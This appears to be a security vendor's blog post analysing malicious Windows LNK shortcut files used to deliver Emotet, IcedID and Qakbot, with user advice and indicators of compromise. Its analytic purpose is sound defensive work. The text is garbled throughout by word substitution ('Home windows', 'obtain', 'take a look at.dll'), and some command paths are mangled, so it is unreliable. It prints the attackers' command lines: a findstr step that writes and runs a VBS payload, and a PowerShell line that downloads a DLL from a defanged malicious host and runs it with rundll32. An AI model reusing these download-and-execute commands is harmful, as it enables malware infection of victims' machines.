Authored by Lakshya Mathur
An LNK file is a Home windows Shortcut that serves as a pointer to open a file, folder, or software. LNK information are based mostly on the Shell Hyperlink binary file format, which holds info used to entry one other information object. These information might be created manually utilizing the usual right-click create shortcut choice or typically they’re created mechanically whereas operating an software. There are a lot of instruments additionally out there to construct LNK information, additionally many individuals have constructed “lnkbombs” instruments particularly for malicious functions.
Throughout the second quarter of 2022, McAfee Labs has seen an increase in malware being delivered utilizing LNK information. Attackers are exploiting the convenience of LNK, and are utilizing it to ship malware like Emotet, Qakbot, IcedID, Bazarloaders, and so forth.
On this weblog, we’ll see how LNK information are getting used to ship malware corresponding to Emotet, Qakbot, and IcedID.
Beneath is a screenshot of how these shortcut information look to a standard person.
LNK THREAT ANALYSIS & CAMPAIGNS
With Microsoft disabling office macros by default malware actors at the moment are enhancing their lure strategies together with exploiting LNK information to realize their targets.
Menace actors are utilizing electronic mail spam and malicious URLs to ship LNK information to victims. These information instruct respectable purposes like PowerShell, CMD, and MSHTA to obtain malicious information.
We’ll undergo three latest malware campaigns Emotet, IcedID, and Qakbot to see how harmful these information might be.
In Determine 4 we are able to see the lure message and connected malicious LNK file.
The person is contaminated by manually accessing the connected LNK file. To dig slightly deeper, we see the properties of the LNK file:
As seen in Determine 5 the goal half reveals that LNK invokes the Home windows Command Processor (cmd.exe). The goal path as seen within the properties is just seen to 255 characters. Nevertheless, command-line arguments might be as much as 4096, so malicious actors can that this benefit and move on lengthy arguments as they are going to be not seen within the properties.
In our case the argument is /v:on /c findstr “glKmfOKnQLYKnNs.*” “Kind 04.25.2022, US.lnk” > “%tmppercentYlScZcZKeP.vbs” & “%tmppercentYlScZcZKeP.vbs”
As soon as the findstr.exe utility receives the talked about string, the remainder of the content material of the LNK file is saved in a .VBS file below the %temp% folder with the random title YIScZcZKeP.vbs
The following a part of the cmd.exe command invokes the VBS file utilizing the Home windows Script Host (wscript.exe) to obtain the principle Emotet 64-bit DLL payload.
The downloaded DLL is then lastly executed utilizing the REGSVR32.EXE utility which has similarities conduct to the excel(.xls) based mostly model of the emotet.
This assault is an ideal instance of how attackers chain LNK, PowerShell, and MSHTA utilities goal their victims.
Right here, PowerShell LNK has a extremely obfuscated parameter which might be seen in Determine 8 goal a part of the LNK properties
The parameter is exceptionally lengthy and isn’t absolutely seen within the goal half. The entire obfuscated argument is decrypted at run-time after which executes MSHTA with argument hxxps://hectorcalle[.]com/093789.hta.
The downloaded HTA file invokes one other PowerShell that has an analogous obfuscated parameter, however this connects to Uri hxxps://hectorcalle[.]com/listbul.exe
The Uri downloads the IcedID installer 64-bit EXE payload below the %HOME% folder.
This assault will present us how attackers can immediately hardcode malicious URLs to run together with utilities like PowerShell and obtain essential risk payloads.
In Determine 10 the complete goal half argument is “C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -NoExit iwr -Uri hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile $env:TEMPtest.dll;Begin-Course of rundll32.exe $env:TEMPtest.dll,jhbvygftr”
When this PowerShell LNK is invoked, it connects to hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png utilizing the Invoke-WebRequest command and the obtain file is saved below the %temp% folder with the title take a look at.dll
That is the principle Qakbot DLL payload which is then executed utilizing the rundll32 utility.
As we noticed within the above three risk campaigns, it’s understood that attackers abuse the home windows shortcut LNK information and made them to be extraordinarily harmful to the frequent customers. LNK mixed with PowerShell, CMD, MSHTA, and so forth., can do extreme harm to the sufferer’s machine. Malicious LNKs are typically seen to be utilizing PowerShell and CMD by which they’ll hook up with malicious URLs to obtain malicious payloads.
We coated simply three of the risk households right here, however these information have been seen utilizing different home windows utilities to ship various varieties of malicious payloads. Some of these assaults are nonetheless evolving, so each person should give an intensive examine whereas utilizing LNK shortcut information. Customers should maintain their Working system and Anti-Virus updated. They need to watch out for phishing mail and clicking on malicious hyperlinks and attachments.
IOC (Indicators of Compromise)
|URLs (Uniform Useful resource Locator)
|All URLs Blocked
Id theft safety and privateness in your digital life